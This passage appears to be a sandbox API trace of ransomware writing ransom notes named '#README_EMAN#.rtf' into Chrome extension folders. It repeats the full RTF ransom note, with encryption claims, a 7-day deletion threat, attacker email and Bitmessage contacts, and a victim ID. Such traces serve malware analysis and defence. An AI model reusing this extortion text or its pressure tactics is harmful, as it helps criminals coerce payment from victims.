th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.208] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.209] CloseHandle (hObject=0x294) returned 1 [0278.209] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0278.209] GetLastError () returned 0x2 [0278.209] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 